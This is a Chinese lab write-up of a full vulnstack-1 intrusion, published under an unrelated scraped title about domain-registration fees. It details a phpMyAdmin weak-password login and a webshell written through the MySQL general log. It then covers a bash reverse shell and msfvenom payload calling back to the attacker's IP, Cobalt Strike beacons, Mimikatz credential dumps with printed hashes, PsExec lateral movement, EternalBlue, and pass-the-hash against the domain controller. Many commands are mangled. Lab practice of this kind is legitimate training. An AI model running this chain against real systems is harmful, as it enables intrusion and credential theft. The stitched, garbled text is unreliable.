甘肃省通信管理局网站企业域名注册费用

甘肃省通信管理局网站,企业域名注册费用,网站建站代理加盟,肇庆网站制作企业本文记录 vulnstack-1 靶机渗透全程#xff1a;从环境配置入手#xff0c;围绕 phpmyadmin 弱口令漏洞提权、shell 上传#xff0c;再通过 CS、MSF 完成多层渗透#xff0c;一步步拿下 DC。 #xff08;真实万字解析#xff09; 总耗时9小时 文章目录靶场环境配置以及介绍…本文记录 vulnstack-1 靶机渗透全程从环境配置入手围绕 phpmyadmin 弱口令漏洞提权、shell 上传再通过 CS、MSF 完成多层渗透一步步拿下 DC。真实万字解析总耗时9小时文章目录靶场环境配置以及介绍信息收集高危漏洞phpmyadmin弱口令进行phpmyadmin提权上传shell文件来与kali进行监听CS渗透第一层攻破Web服务器第二层攻破域内主机第三层攻破DC(未成功)MSF渗透上线payload添加路由内网网段内网信息收集如果乱码就换个工具CS渗透攻击阶段总结靶场环境配置以及介绍本次给大家带来的内网靶场网络拓扑结构如下需要主机(44网段用来模拟外网—kali与Web服务器互相通信22网段模拟内网)kali主机192.168.44.146Web服务器192.168.44.162和192.168.22.53域内主机PC192.168.22.54域控DC192.168.22.55本次内网靶场整体思路Kali —Web服务器漏洞获取权限 —横向到域内主机PC —拿下域控话不多说我们直接开始实战信息收集首先我们打开kali对Web服务器进行信息收集# 扫描目标主机网段nmap -sP192.168.44.0/24可以发现一台新主机192.168.44.162随后对其进行更加详细的信息收集# 详细信息收集nmap -sC -sV -v -A -p-192.168.44.162如果没有看到80端口需要去Web服务器去开放别问我为什么花了40分钟才知道打开Web服务器的phpstudy服务成功开启80和3306服务高危漏洞phpmyadmin弱口令我们首先访问Web服务的IP地址http://192.168.44.162/发现了3306的MySQL服务nmap中得到是unauthorized该页面发现了使用phpstudy服务随后尝试输入MySQL的弱口令root:root随后尝试ssh远程连接mysql -uroot -h192.168.44.162 -p发现拒绝连接可以推测该服务设置了远程访问白名单随后我们继续对Web页面进行目录扫描python dirsearch.py -t100-u http://192.168.44.162/ --include-status200,301随后发现了**/phpmyadmin**页面随后使用rootroot进行登录这个l.php就是php探针页面成功以root权限进入数据库进行phpmyadmin提权随后我们可以利用数据库反弹一个shell来获取主机控制权将密码放到在线网站进行解密成功得到密码root随后尝试查看phpmyadmin日志文件获取Web服务器权限show variables likegeneral_log%;得到信息目前日志功能是关闭状态且默认日志文件路径为C:\phpStudy\MySQL\data\stu1.log然后将日志开启并将日志文件保存位置修改为我们能够访问的Web目录setglobalgeneral_logon;setglobalgeneral_log_fileC:\phpstudy\WWW\shell.php;接下来我们就写入shell.php的内容来反弹一个shellselect?php system($_POST[cmd]);?;得到结果上述语句执行完成后php代码?php system$_REQUEST[cmd];?将被写入shell.php文件。接着就可以通过访问http://192.168.44.162/shell.php来验证该webshell的可用性了:http://192.168.44.162/shell.php?cmdwhoami http://192.168.44.162/shell.php?cmdipconfig网络配置发现内网网段22上传shell文件来与kali进行监听方法一通过shell文件命令执行来与kali进行监听使用cmd来执行bash反弹等命令例如bash -i /dev/tcp/192.168.44.146/8888 01(192.168.44.146为kali的地址)方法二利用yxcms来上传shell进行监听这里执行方法二这里我们执行命令http://192.168.44.162/shell.php?cmddir后发现了/yxcms目录随后访问网站http://192.168.44.162/yxcms/找到一个页面并且在通知信息找到一个默认的账号密码yxcms在漏洞库没有找到漏洞随后我们输入网址进入后台http://192.168.44.162/yxcms/index.php?radmin/index/login根据旁边的功能栏我想到两种方法一是通过前端Web页面插入一句话木马等文件二是通过SQL语句继续执行注入脚本这里采用通过前台模板输入CS等Webshel来进行连接具体步骤1写入一句话或者写入日志这里刚好就有编辑模板的地方我们新增一个web.php问题文件建立是建立了shell.php 生成到哪了呢方法一问AI首先默认目录yxcms 的前台模板默认存放在根目录下的template或templates文件夹具体是template/default/default 是默认模板标识若换了模板就是对应名称比如完整路径/var/www/html/yxcms/template/default/LinuxC:\phpStudy\WWW\yxcms\template\default\Windows。方法二将刚刚上传的shell.php用户命令执行的换成一句话木马直接连接蚁剑——可以得到一个压缩包这里就需要我们前面提到的 beifen.rar 备份文件了我们把备份文件解压在里面寻找模板的这么多php 都存放在了/yxcms/protected/apps/default/view/default/因此我们的shell.php 就生成在了这里2打开蚁剑进行cs上传http://192.168.44.162/yxcms/protected/apps/default/view/default/web.php成功进入CS渗透第一层攻破Web服务器我们在拿到的shell 执行whoami发现是Administrator权限在域中:还发现了一个内网网段22靶机上线CS# 启动CS客户端与服务端./teamserver192.168.44.146123456./cobaltstrike-client.sh启动服务端启动客户端输入后成功启动页面3主机运行CS 客户端并连接 CS 服务端配置好listener监听器之后生成exe后门程序4利用蚁剑 把生成的exe 上传到靶机上5在终端里执行exe文件可以看到靶机上线到CS上cs成功上线6收集主机信息并使用 Mimikatz 直接抓取本机用户密码发现该Web服务器是64位的Windows 7系统因此还需要获得一个64位的反弹shell连接并将其提权为SYSTEM权限从而方便我们后续的内网渗透操作。右键会话抓取密码7并将其提权为SYSTEM权限从而方便我们后续的内网渗透操作getsystem getuid至此我们完全拿下了Web服务器–第二层攻破域内主机输入命令查看域内其他主机的信息net view1点击图标发现了另外两台主机我们发现了两台内网主机其中被标注为PDC的主机即为当前域的主域控制器Primary Domain Controller另一台则为普通的域成员主机我们可以借助Administrator用户进行域内密码喷洒尝试登录其他域主机。PsExec是一种轻量级的Telnet替代品可以在其他系统上执行进程完成控制台应用程序的完全交互而无须手动安装客户端软件。PsExec强大的作用是在远程系统上进行交互式命令提示远程执行ipconfig等cmd命令故能够远程启动服务器上程序、脚本等。2右键一下选择jump —psexec64:3在弹出的页面中选择我们刚才获得的Administrator域用户的用户名及密码作为控制凭证。同时我们需要一个SMB协议的监听器可以点击图中标注位置进行监听器添加的操作。在新弹出的页面中新建SMB协议监听器完成剩余的选项即可选择明文密码或者Hash密码都可以4最后点击Launch按钮即可执行该psexec命令执行后相应的命令产生成功上线PC主机成功上线Win8主机我们将成功获得来自OWA主机的反弹shell连接且权限为SYSTEM用户权限这意味着该主机已被我们完全掌控第三层攻破DC(未成功)使用PsExec建立IPC通道上线域DC与之类似我们可以尝试使用PsExec对剩余的一台域成员主机进行控制。最后一台主机不知道为什么就是不成功有知道原因的可以在评论区讨论一下MSF渗透上线payloadmsfconsole# 启动MSF框架use exploit/multi/handlersetpayload windows/meterpreter/reverse_tcpsetlhost192.168.44.146setlport4444exploit将msfvenom生成的程序上传到蚁剑msfvenom -p windows/x64/meterpreter/reverse_tcplhost192.168.44.146lport4444-f exe -o msf.exe随后执行程序成功反弹了一个session获得 MSF 的会话后即可使用 MSF 集成的诸多强大功能模块和脚本。# 检查是否为虚拟机run post/windows/gather/checkvm# 查看安装了哪些程序run post/windows/gather/enum_applications添加路由内网网段使用如下命令添加路由方便我们的kali主机能够访问到内网主机需要的可以挂代理# 可以用模块自动添加路由run post/multi/manage/autoroute#添加一条路由run autoroute -s192.168.22.0/24#查看路由添加情况run autoroute -p执行background命令将当前执行的 Meterpreter 会话切换到后台后续也可执行sessions 13重新返回会话–内网信息收集如果乱码就换个工具CS进入shell后执行命令收集信息net view# 查看局域网内其他主机名net config Workstation# 查看计算机名、全名、用户名、系统版本、工作站、域、登录域net user# 查看本机用户列表net user /domain# 查看域用户net localgroup administrators# 查看本地管理员组通常会有域用户net view /domain# 查看有几个域net user 用户名 /domain# 获取指定域用户的信息net group /domain# 查看域里面的工作组查看把用户分了多少组只能在域控上操作net group 组名 /domain# 查看域中某工作组net groupdomain admins/domain# 查看域管理员的名字net groupdomain computers/domain# 查看域中的其他主机名net groupdoamin controllers/domain# 查看域控制器主机名可能有多台1收集内网网段2知道域内其他用户的名字后怎么得到他们的IP地址可以ping 机器名3也可以执行命令net config workstation来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息本机在域中以及域的名字4然后使用 MSF 自带auxiliary/scanner/portscan/tcp模块扫描内网域成员主机 192.168.22.54 开放的端口use auxiliary/scanner/portscan/tcpsetrhosts192.168.22.54setports80,135-139,445,3306,3389 run同理扫描一下域控挂代理上传工具使用MSF的socks 5代理服务search socks_proxy use0show options run# 查看代理jobs还可以通过jobs来查看配置proxychains编辑配置文件vim /etc/proxychains.conf 添加socks5127.0.0.11080使用proxychain扫描网段查找DC域控的IPproxychains nmap192.168.22.0/24尝试访问PC主机Win Server 2008的网页成功访问成功至此我们也知道了域控的IP地址192.168.22.55–渗透攻击阶段1、msf扫描模块探测是否存在ms17-010漏洞对于开启了 445 端口的 Windows 服务器肯定是要进行一波永恒之蓝扫描尝试的借助 MSF 自带的漏洞扫描模块进行扫描use exploit/windows/smb/ms17_010_eternalbluesetpayload windows/x64/meterpreter/bind_tcp#内网环境需要正向shell连接setrhosts192.168.44.55 run并没有拿到shell看师傅的博客说好像通过 ms17-010直接拿到shell的情况并不多成功率不高2、哈希传递攻击(PTH)拿下域控CS的PTH已演示本次演示MSF的PTH# 进入到meterpreter后执行run windows/gather/smart_hashdump getsystem getuid要SYSTEM权限我们直接getsystem发现可以正常提权执行命令得到管理员的密码的hash[]Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[]liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::2但是这个只是用户密码的一个hash值我们在msf里加载mimikatz模块ms6中 mimikatz模块已经合并为kiwi模块load kiwi creds_all#列举所有凭据creds_kerberos#列举所有kerberos凭据creds_msv#列举所有msv凭据creds_ssp#列举所有ssp凭据creds_tspkg#列举所有tspkg凭据creds_wdigest#列举所有wdigest凭据dcsync#通过DCSync检索用户帐户信息dcsync_ntlm#通过DCSync检索用户帐户NTLM散列、SID和RIDgolden_ticket_create#创建黄金票据kerberos_ticket_list#列举kerberos票据kerberos_ticket_purge#清除kerberos票据kerberos_ticket_use#使用kerberos票据kiwi_cmd#执行mimikatz的命令后面接mimikatz.exe的命令lsa_dump_sam#dump出lsa的SAMlsa_dump_secrets#dump出lsa的密文password_change#修改密码wifi_list#列出当前用户的wifi配置文件wifi_list_shared#列出共享wifi配置文件/编码lsa_dump_sam获得 NTLM Hash31d6cfe0d16ae931b73c59d7e0c089c0随后执行exploit/windows/smb/psexec模块哈希传递攻击Windows Server 2008为例use exploit/windows/smb/psexecsetrhosts192.168.22.54setsmbuser administratorsetsmbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0setsmbdomain god run可惜未能成功而CS就能够拿下Win 2008总结1CS没能拿下DC域控差最后一步2MSF的PTH横向失败可以尝试其他模块烂尾了唉auxiliary/admin/smb/psexec_command#在目标机器上执行系统命令exploit/windows/smb/psexec#用psexec执行系统命令exploit/windows/smb/psexec_psh#使用powershell作为payload期待下次再见